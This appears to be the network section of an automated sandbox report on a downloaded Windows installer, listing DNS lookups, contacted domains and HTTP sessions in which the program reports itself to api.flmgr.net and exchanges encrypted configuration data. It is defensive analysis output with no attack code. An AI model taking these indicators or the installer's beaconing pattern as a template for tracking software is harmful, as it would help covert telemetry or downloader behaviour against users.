                                                                                      Aug 4, 2023 18:48:34.672538996 CEST8.8.8.8192.168.2.30xf18eNo error (0)download.ihsdus.cn.8213c51d.c.cdnhwc1.comhcdnd101.vip.cdnhwczxh101.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:34.672538996 CEST8.8.8.8192.168.2.30xf18eNo error (0)hcdnd101.vip.cdnhwczxh101.com218.12.76.161A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:34.672538996 CEST8.8.8.8192.168.2.30xf18eNo error (0)hcdnd101.vip.cdnhwczxh101.com120.52.95.245A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:34.672538996 CEST8.8.8.8192.168.2.30xf18eNo error (0)hcdnd101.vip.cdnhwczxh101.com120.52.95.247A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:34.672538996 CEST8.8.8.8192.168.2.30xf18eNo error (0)hcdnd101.vip.cdnhwczxh101.com218.12.76.159A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:36.797771931 CEST8.8.8.8192.168.2.30xbe30No error (0)download.ihsdus.cndownload.ihsdus.cn.8213c51d.c.cdnhwc1.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:36.797771931 CEST8.8.8.8192.168.2.30xbe30No error (0)download.ihsdus.cn.8213c51d.c.cdnhwc1.comhcdnd101.vip.cdnhwczxh101.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:36.797771931 CEST8.8.8.8192.168.2.30xbe30No error (0)hcdnd101.vip.cdnhwczxh101.com218.12.76.161A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:36.797771931 CEST8.8.8.8192.168.2.30xbe30No error (0)hcdnd101.vip.cdnhwczxh101.com120.52.95.245A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:36.797771931 CEST8.8.8.8192.168.2.30xbe30No error (0)hcdnd101.vip.cdnhwczxh101.com120.52.95.247A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:48:36.797771931 CEST8.8.8.8192.168.2.30xbe30No error (0)hcdnd101.vip.cdnhwczxh101.com218.12.76.159A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:00.376635075 CEST8.8.8.8192.168.2.30x46cfNo error (0)api.flmgr.net123.57.49.36A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:02.815351009 CEST8.8.8.8192.168.2.30x8fbcNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:02.815351009 CEST8.8.8.8192.168.2.30x8fbcNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:02.815351009 CEST8.8.8.8192.168.2.30x8fbcNo error (0)www.wshifen.com103.235.46.40A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:02.930957079 CEST8.8.8.8192.168.2.30x81c8No error (0)api.flmgr.net123.57.49.36A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:02.959062099 CEST8.8.8.8192.168.2.30x3f33No error (0)api.flmgr.net123.57.49.36A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:25.131699085 CEST8.8.8.8192.168.2.30x3828No error (0)static.flmgr.netstatic.flmgr.net.d7fd4b42.cdnhwc8.cnCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:25.131699085 CEST8.8.8.8192.168.2.30x3828No error (0)static.flmgr.net.d7fd4b42.cdnhwc8.cnhcdnd102.gslb.c.cdnhwc2.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:25.131699085 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com218.12.76.161A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:25.131699085 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com218.12.76.158A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:25.131699085 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com120.52.95.249A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:25.131699085 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com120.52.95.247A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:26.286973000 CEST8.8.8.8192.168.2.30x3828No error (0)static.flmgr.netstatic.flmgr.net.d7fd4b42.cdnhwc8.cnCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:26.286973000 CEST8.8.8.8192.168.2.30x3828No error (0)static.flmgr.net.d7fd4b42.cdnhwc8.cnhcdnd102.gslb.c.cdnhwc2.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:26.286973000 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com120.52.95.249A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:26.286973000 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com120.52.95.247A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:26.286973000 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com218.12.76.161A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:26.286973000 CEST8.8.8.8192.168.2.30x3828No error (0)hcdnd102.gslb.c.cdnhwc2.com218.12.76.158A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:32.511601925 CEST8.8.8.8192.168.2.30xa91cNo error (0)s.360.cn180.163.251.230A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:32.511601925 CEST8.8.8.8192.168.2.30xa91cNo error (0)s.360.cn171.8.167.90A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:32.511601925 CEST8.8.8.8192.168.2.30xa91cNo error (0)s.360.cn171.13.14.66A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:32.511601925 CEST8.8.8.8192.168.2.30xa91cNo error (0)s.360.cn171.8.167.89A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:35.143296003 CEST8.8.8.8192.168.2.30x8569No error (0)api.flmgr.net123.57.49.36A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:38.808065891 CEST8.8.8.8192.168.2.30xa980No error (0)dl.360safe.comdl.360safe.com.qh-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:38.808065891 CEST8.8.8.8192.168.2.30xa980No error (0)dl.360safe.com.qh-cdn.comdl.360safe.com.dl.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:38.808065891 CEST8.8.8.8192.168.2.30xa980No error (0)dl.360safe.com.dl.360qhcdn.com104.192.108.19A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:38.808065891 CEST8.8.8.8192.168.2.30xa980No error (0)dl.360safe.com.dl.360qhcdn.com104.192.108.20A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:38.808065891 CEST8.8.8.8192.168.2.30xa980No error (0)dl.360safe.com.dl.360qhcdn.com104.192.108.21A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:38.808065891 CEST8.8.8.8192.168.2.30xa980No error (0)dl.360safe.com.dl.360qhcdn.com104.192.108.17A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:41.287421942 CEST8.8.8.8192.168.2.30x64b1No error (0)inf.safe.360.cn180.163.237.185A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:58.607841015 CEST8.8.8.8192.168.2.30x81d8No error (0)s.360.cn180.163.251.230A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:58.607841015 CEST8.8.8.8192.168.2.30x81d8No error (0)s.360.cn171.8.167.90A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:58.607841015 CEST8.8.8.8192.168.2.30x81d8No error (0)s.360.cn171.13.14.66A (IP address)IN (0x0001)false
                                                                                      Aug 4, 2023 18:49:58.607841015 CEST8.8.8.8192.168.2.30x81d8No error (0)s.360.cn171.8.167.89A (IP address)IN (0x0001)false
                                                                                      • www.onlinedown.net
                                                                                      • https:
                                                                                        • img.onlinedown.net
                                                                                      • download.ihsdus.cn
                                                                                      • dl.360safe.com
                                                                                      • api.flmgr.net
                                                                                      • api.nasyeo.com
                                                                                      • static.flmgr.net
                                                                                      • s.360.cn
                                                                                      • inf.safe.360.cn
                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.349707113.142.34.181443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.349710120.52.95.236443C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      10192.168.2.349753104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      11192.168.2.349700123.57.49.3680C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:46:59.274697065 CEST92OUTGET /log/client/site_soft?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1
                                                                                      Cache-Control: no-store
                                                                                      Connection: Keep-Alive
                                                                                      Expires: 0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:46:59.620918036 CEST93INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:46:59 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 2
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 7b 7d
                                                                                      Data Ascii: {}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      12192.168.2.349705123.57.49.3680C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Aug 4, 2023 18:48:05.347435951 CEST97OUTPOST /v1/client/configs HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Proxy-Connection: Keep-Alive
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: text/plain, application/xhtml+xml
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
                                                                                      Content-Length: 216
                                                                                      Host: api.flmgr.net
                                                                                      Aug 4, 2023 18:48:05.347498894 CEST97OUTData Raw: 75 41 6e 68 77 79 36 56 62 45 79 4a 77 6e 53 58 4a 69 38 32 4d 68 59 63 32 56 39 4b 4c 4f 51 54 53 68 52 68 6a 4c 6a 30 74 30 6c 50 55 6c 70 34 70 69 37 37 30 6d 54 74 42 30 75 36 44 41 47 76 51 66 33 30 41 31 71 66 34 71 2b 4d 4d 58 30 76 67 33
                                                                                      Data Ascii: uAnhwy6VbEyJwnSXJi82MhYc2V9KLOQTShRhjLj0t0lPUlp4pi770mTtB0u6DAGvQf30A1qf4q+MMX0vg39ZGYtSFr7CMujS+/P111iQKSMXbU5xFLxiTsTYDIEmNndUWcyw35q1W+SX8OwcDt3dPTer9dlMv7OWuvbMz6a9Leh7Oopum/6oERGSoUsj3LTxdGvVbbJR1mxvPcMMFAl+og==
                                                                                      Aug 4, 2023 18:48:05.758400917 CEST99INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:05 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 800
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 75 43 47 43 6a 32 48 45 57 6d 71 4f 77 7a 44 5a 4a 6a 34 75 50 6c 6f 73 7a 56 6f 53 5a 61 74 47 42 45 49 51 32 66 79 7a 2f 41 46 50 4e 78 67 73 70 69 58 70 30 33 4c 7a 46 7a 33 7a 57 6e 37 42 51 2b 66 32 46 53 33 41 70 5a 76 48 66 53 4a 42 77 48 63 50 4b 74 35 42 42 72 72 55 61 71 7a 58 37 75 32 78 6f 6c 4f 42 62 57 63 77 4e 51 38 39 55 72 4e 31 47 74 4f 57 54 50 55 70 5a 69 67 71 4f 6f 58 6b 68 49 6d 6f 54 4b 58 43 76 71 6b 63 42 64 48 63 4d 53 79 6e 67 6f 49 67 38 73 2f 31 38 72 4f 4e 38 2b 48 6c 5a 72 31 37 4e 70 49 48 31 37 2f 2b 58 48 66 65 7a 41 78 7a 71 65 65 39 4d 79 79 4c 62 64 77 4b 67 41 30 32 61 49 35 58 46 44 6b 68 6d 61 56 50 66 79 57 2b 64 4b 70 71 2f 63 36 43 37 58 6a 64 69 6e 4e 52 57 6b 4d 6e 39 39 31 56 6b 7a 4b 42 36 6e 54 6f 55 31 45 2b 57 64 78 59 44 34 6e 79 61 46 6c 48 68 62 31 62 73 50 30 4d 2f 43 34 72 4c 70 63 7a 35 43 39 4e 76 54 43 37 34 37 53 48 34 35 6c 56 69 74 68 79 76 74 53 55 51 39 50 6e 4f 64 47 6f 6d 73 6b 37 54 71 54 45 35 53 58 38 77 67 74 5a 59 61 53 75 33 2b 48 74 4d 78 52 37 51 53 77 71 67 54 77 58 44 7a 30 52 56 54 46 31 5a 43 65 33 33 50 7a 2f 69 73 63 65 39 30 73 6b 38 30 2b 4d 42 6f 39 73 62 30 54 6e 6f 47 70 4e 4b 79 54 77 77 4f 57 68 51 4a 6f 73 30 61 45 65 72 48 4a 37 64 61 4b 6a 6f 66 2f 44 4e 31 59 2b 5a 4a 38 41 45 66 70 47 57 49 66 55 6f 46 52 67 73 75 38 39 4c 6c 75 79 43 37 76 63 39 59 53 66 66 32 54 33 6b 37 6e 64 72 66 62 6d 73 33 62 4d 32 79 66 4b 4a 6b 6d 6c 36 44 6a 36 38 78 4c 51 48 50 38 48 4f 59 58 53 4d 41 55 77 58 55 34 38 75 57 4b 54 31 64 4c 79 6d 2b 50 48 61 4d 33 54 47 74 76 4f 45 47 35 54 6d 46 63 57 56 34 42 4b 6e 71 6f 69 72 78 6a 4b 42 4e 46 78 72 72 69 65 43 42 4c 53 2b 73 4d 5a 54 63 61 59 6f 6f 65 6c 32 47 75 69 58 36 61 59 6b 7a 54 67 41 65 63 73 6b 73 62 5a 34 4f 36 46 35 67 70 49 42 67 6f 37 58 74 47 47 33 2f 56 49 54 54 30 6c 42 33 4e 4b 72 35 6c 39 41 31 63 4d 6b 4f 71 74 2b 46 70 6f 68 4d 4e 71 4c 47 6f 65 68 45 49 71 59 48 6b 7a 47 37 63 74 36 62 31 35 74 31 63 46 38 6b 36 69 4b 2f 7a 30 49 64 70 74 4f 5a 75 4f 33 49 66 56 6f 53 56 36 73 49 50 41 42 45 49 6b 58 6b 39 4a 31 63 76 66 68 33 45 74 69 76 52 4d 5a 71 44 4a 53 43
                                                                                      Data Ascii: uCGCj2HEWmqOwzDZJj4uPloszVoSZatGBEIQ2fyz/AFPNxgspiXp03LzFz3zWn7BQ+f2FS3ApZvHfSJBwHcPKt5BBrrUaqzX7u2xolOBbWcwNQ89UrN1GtOWTPUpZigqOoXkhImoTKXCvqkcBdHcMSyngoIg8s/18rON8+HlZr17NpIH17/+XHfezAxzqee9MyyLbdwKgA02aI5XFDkhmaVPfyW+dKpq/c6C7XjdinNRWkMn991VkzKB6nToU1E+WdxYD4nyaFlHhb1bsP0M/C4rLpcz5C9NvTC747SH45lVithyvtSUQ9PnOdGomsk7TqTE5SX8wgtZYaSu3+HtMxR7QSwqgTwXDz0RVTF1ZCe33Pz/isce90sk80+MBo9sb0TnoGpNKyTwwOWhQJos0aEerHJ7daKjof/DN1Y+ZJ8AEfpGWIfUoFRgsu89LluyC7vc9YSff2T3k7ndrfbms3bM2yfKJkml6Dj68xLQHP8HOYXSMAUwXU48uWKT1dLym+PHaM3TGtvOEG5TmFcWV4BKnqoirxjKBNFxrrieCBLS+sMZTcaYooel2GuiX6aYkzTgAecsksbZ4O6F5gpIBgo7XtGG3/VITT0lB3NKr5l9A1cMkOqt+FpohMNqLGoehEIqYHkzG7ct6b15t1cF8k6iK/z0IdptOZuO3IfVoSV6sIPABEIkXk9J1cvfh3EtivRMZqDJSC
                                                                                      Aug 4, 2023 18:48:05.758441925 CEST99INData Raw: 37 4f 62 64 33 49 2f 38 44 63 6e 30 44 38 4e 6a 41 31 62 69 72 57 30 41 41 68 74 4c 37 34 48 6b 72 4a 46 76 4a 4f 73 70 59 69 64 6f 74 47 33 44 42 4e 33 30 72 6e 4d 73 30 51 44 68 79 6c 64 49 51 59 43 2f 63 6f 4a 51 36 66 63 72 64 4f 55 67 30 58
                                                                                      Data Ascii: 7Obd3I/8Dcn0D8NjA1birW0AAhtL74HkrJFvJOspYidotG3DBN30rnMs0QDhyldIQYC/coJQ6fcrdOUg0XBA==
                                                                                      Aug 4, 2023 18:48:06.614820957 CEST99INData Raw: 37 4f 62 64 33 49 2f 38 44 63 6e 30 44 38 4e 6a 41 31 62 69 72 57 30 41 41 68 74 4c 37 34 48 6b 72 4a 46 76 4a 4f 73 70 59 69 64 6f 74 47 33 44 42 4e 33 30 72 6e 4d 73 30 51 44 68 79 6c 64 49 51 59 43 2f 63 6f 4a 51 36 66 63 72 64 4f 55 67 30 58
                                                                                      Data Ascii: 7Obd3I/8Dcn0D8NjA1birW0AAhtL74HkrJFvJOspYidotG3DBN30rnMs0QDhyldIQYC/coJQ6fcrdOUg0XBA==
                                                                                      Aug 4, 2023 18:48:07.894826889 CEST101INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:05 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 800
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 75 43 47 43 6a 32 48 45 57 6d 71 4f 77 7a 44 5a 4a 6a 34 75 50 6c 6f 73 7a 56 6f 53 5a 61 74 47 42 45 49 51 32 66 79 7a 2f 41 46 50 4e 78 67 73 70 69 58 70 30 33 4c 7a 46 7a 33 7a 57 6e 37 42 51 2b 66 32 46 53 33 41 70 5a 76 48 66 53 4a 42 77 48 63 50 4b 74 35 42 42 72 72 55 61 71 7a 58 37 75 32 78 6f 6c 4f 42 62 57 63 77 4e 51 38 39 55 72 4e 31 47 74 4f 57 54 50 55 70 5a 69 67 71 4f 6f 58 6b 68 49 6d 6f 54 4b 58 43 76 71 6b 63 42 64 48 63 4d 53 79 6e 67 6f 49 67 38 73 2f 31 38 72 4f 4e 38 2b 48 6c 5a 72 31 37 4e 70 49 48 31 37 2f 2b 58 48 66 65 7a 41 78 7a 71 65 65 39 4d 79 79 4c 62 64 77 4b 67 41 30 32 61 49 35 58 46 44 6b 68 6d 61 56 50 66 79 57 2b 64 4b 70 71 2f 63 36 43 37 58 6a 64 69 6e 4e 52 57 6b 4d 6e 39 39 31 56 6b 7a 4b 42 36 6e 54 6f 55 31 45 2b 57 64 78 59 44 34 6e 79 61 46 6c 48 68 62 31 62 73 50 30 4d 2f 43 34 72 4c 70 63 7a 35 43 39 4e 76 54 43 37 34 37 53 48 34 35 6c 56 69 74 68 79 76 74 53 55 51 39 50 6e 4f 64 47 6f 6d 73 6b 37 54 71 54 45 35 53 58 38 77 67 74 5a 59 61 53 75 33 2b 48 74 4d 78 52 37 51 53 77 71 67 54 77 58 44 7a 30 52 56 54 46 31 5a 43 65 33 33 50 7a 2f 69 73 63 65 39 30 73 6b 38 30 2b 4d 42 6f 39 73 62 30 54 6e 6f 47 70 4e 4b 79 54 77 77 4f 57 68 51 4a 6f 73 30 61 45 65 72 48 4a 37 64 61 4b 6a 6f 66 2f 44 4e 31 59 2b 5a 4a 38 41 45 66 70 47 57 49 66 55 6f 46 52 67 73 75 38 39 4c 6c 75 79 43 37 76 63 39 59 53 66 66 32 54 33 6b 37 6e 64 72 66 62 6d 73 33 62 4d 32 79 66 4b 4a 6b 6d 6c 36 44 6a 36 38 78 4c 51 48 50 38 48 4f 59 58 53 4d 41 55 77 58 55 34 38 75 57 4b 54 31 64 4c 79 6d 2b 50 48 61 4d 33 54 47 74 76 4f 45 47 35 54 6d 46 63 57 56 34 42 4b 6e 71 6f 69 72 78 6a 4b 42 4e 46 78 72 72 69 65 43 42 4c 53 2b 73 4d 5a 54 63 61 59 6f 6f 65 6c 32 47 75 69 58 36 61 59 6b 7a 54 67 41 65 63 73 6b 73 62 5a 34 4f 36 46 35 67 70 49 42 67 6f 37 58 74 47 47 33 2f 56 49 54 54 30 6c 42 33 4e 4b 72 35 6c 39 41 31 63 4d 6b 4f 71 74 2b 46 70 6f 68 4d 4e 71 4c 47 6f 65 68 45 49 71 59 48 6b 7a 47 37 63 74 36 62 31 35 74 31 63 46 38 6b 36 69 4b 2f 7a 30 49 64 70 74 4f 5a 75 4f 33 49 66 56 6f 53 56 36 73 49 50 41 42 45 49 6b 58 6b 39 4a 31 63 76 66 68 33 45 74 69 76 52 4d 5a 71 44 4a 53 43
                                                                                      Data Ascii: uCGCj2HEWmqOwzDZJj4uPloszVoSZatGBEIQ2fyz/AFPNxgspiXp03LzFz3zWn7BQ+f2FS3ApZvHfSJBwHcPKt5BBrrUaqzX7u2xolOBbWcwNQ89UrN1GtOWTPUpZigqOoXkhImoTKXCvqkcBdHcMSyngoIg8s/18rON8+HlZr17NpIH17/+XHfezAxzqee9MyyLbdwKgA02aI5XFDkhmaVPfyW+dKpq/c6C7XjdinNRWkMn991VkzKB6nToU1E+WdxYD4nyaFlHhb1bsP0M/C4rLpcz5C9NvTC747SH45lVithyvtSUQ9PnOdGomsk7TqTE5SX8wgtZYaSu3+HtMxR7QSwqgTwXDz0RVTF1ZCe33Pz/isce90sk80+MBo9sb0TnoGpNKyTwwOWhQJos0aEerHJ7daKjof/DN1Y+ZJ8AEfpGWIfUoFRgsu89LluyC7vc9YSff2T3k7ndrfbms3bM2yfKJkml6Dj68xLQHP8HOYXSMAUwXU48uWKT1dLym+PHaM3TGtvOEG5TmFcWV4BKnqoirxjKBNFxrrieCBLS+sMZTcaYooel2GuiX6aYkzTgAecsksbZ4O6F5gpIBgo7XtGG3/VITT0lB3NKr5l9A1cMkOqt+FpohMNqLGoehEIqYHkzG7ct6b15t1cF8k6iK/z0IdptOZuO3IfVoSV6sIPABEIkXk9J1cvfh3EtivRMZqDJSC
                                                                                      Aug 4, 2023 18:48:10.390760899 CEST102INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.20.1
                                                                                      Date: Fri, 04 Aug 2023 16:48:05 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 800
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                      Access-Control-Allow-Headers: DNT,web-token,app-token,Authorization,Accept,Origin,Keep-Alive,User-Agent,X-Mx-ReqToken,X-Data-Type,X-Auth-Token,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Range
                                                                                      Data Raw: 75 43 47 43 6a 32 48 45 57 6d 71 4f 77 7a 44 5a 4a 6a 34 75 50 6c 6f 73 7a 56 6f 53 5a 61 74 47 42 45 49 51 32 66 79 7a 2f 41 46 50 4e 78 67 73 70 69 58 70 30 33 4c 7a 46 7a 33 7a 57 6e 37 42 51 2b 66 32 46 53 33 41 70 5a 76 48 66 53 4a 42 77 48 63 50 4b 74 35 42 42 72 72 55 61 71 7a 58 37 75 32 78 6f 6c 4f 42 62 57 63 77 4e 51 38 39 55 72 4e 31 47 74 4f 57 54 50 55 70 5a 69 67 71 4f 6f 58 6b 68 49 6d 6f 54 4b 58 43 76 71 6b 63 42 64 48 63 4d 53 79 6e 67 6f 49 67 38 73 2f 31 38 72 4f 4e 38 2b 48 6c 5a 72 31 37 4e 70 49 48 31 37 2f 2b 58 48 66 65 7a 41 78 7a 71 65 65 39 4d 79 79 4c 62 64 77 4b 67 41 30 32 61 49 35 58 46 44 6b 68 6d 61 56 50 66 79 57 2b 64 4b 70 71 2f 63 36 43 37 58 6a 64 69 6e 4e 52 57 6b 4d 6e 39 39 31 56 6b 7a 4b 42 36 6e 54 6f 55 31 45 2b 57 64 78 59 44 34 6e 79 61 46 6c 48 68 62 31 62 73 50 30 4d 2f 43 34 72 4c 70 63 7a 35 43 39 4e 76 54 43 37 34 37 53 48 34 35 6c 56 69 74 68 79 76 74 53 55 51 39 50 6e 4f 64 47 6f 6d 73 6b 37 54 71 54 45 35 53 58 38 77 67 74 5a 59 61 53 75 33 2b 48 74 4d 78 52 37 51 53 77 71 67 54 77 58 44 7a 30 52 56 54 46 31 5a 43 65 33 33 50 7a 2f 69 73 63 65 39 30 73 6b 38 30 2b 4d 42 6f 39 73 62 30 54 6e 6f 47 70 4e 4b 79 54 77 77 4f 57 68 51 4a 6f 73 30 61 45 65 72 48 4a 37 64 61 4b 6a 6f 66 2f 44 4e 31 59 2b 5a 4a 38 41 45 66 70 47 57 49 66 55 6f 46 52 67 73 75 38 39 4c 6c 75 79 43 37 76 63 39 59 53 66 66 32 54 33 6b 37 6e 64 72 66 62 6d 73 33 62 4d 32 79 66 4b 4a 6b 6d 6c 36 44 6a 36 38 78 4c 51 48 50 38 48 4f 59 58 53 4d 41 55 77 58 55 34 38 75 57 4b 54 31 64 4c 79 6d 2b 50 48 61 4d 33 54 47 74 76 4f 45 47 35 54 6d 46 63 57 56 34 42 4b 6e 71 6f 69 72 78 6a 4b 42 4e 46 78 72 72 69 65 43 42 4c 53 2b 73 4d 5a 54 63 61 59 6f 6f 65 6c 32 47 75 69 58 36 61 59 6b 7a 54 67 41 65 63 73 6b 73 62 5a 34 4f 36 46 35 67 70 49 42 67 6f 37 58 74 47 47 33 2f 56 49 54 54 30 6c 42 33 4e 4b 72 35 6c 39 41 31 63 4d 6b 4f 71 74 2b 46 70 6f 68 4d 4e 71 4c 47 6f 65 68 45 49 71 59 48 6b 7a 47 37 63 74 36 62 31 35 74 31 63 46 38 6b 36 69 4b 2f 7a 30 49 64 70 74 4f 5a 75 4f 33 49 66 56 6f 53 56 36 73 49 50 41 42 45 49 6b 58 6b 39 4a 31 63 76 66 68 33 45 74 69 76 52 4d 5a 71 44 4a 53 43
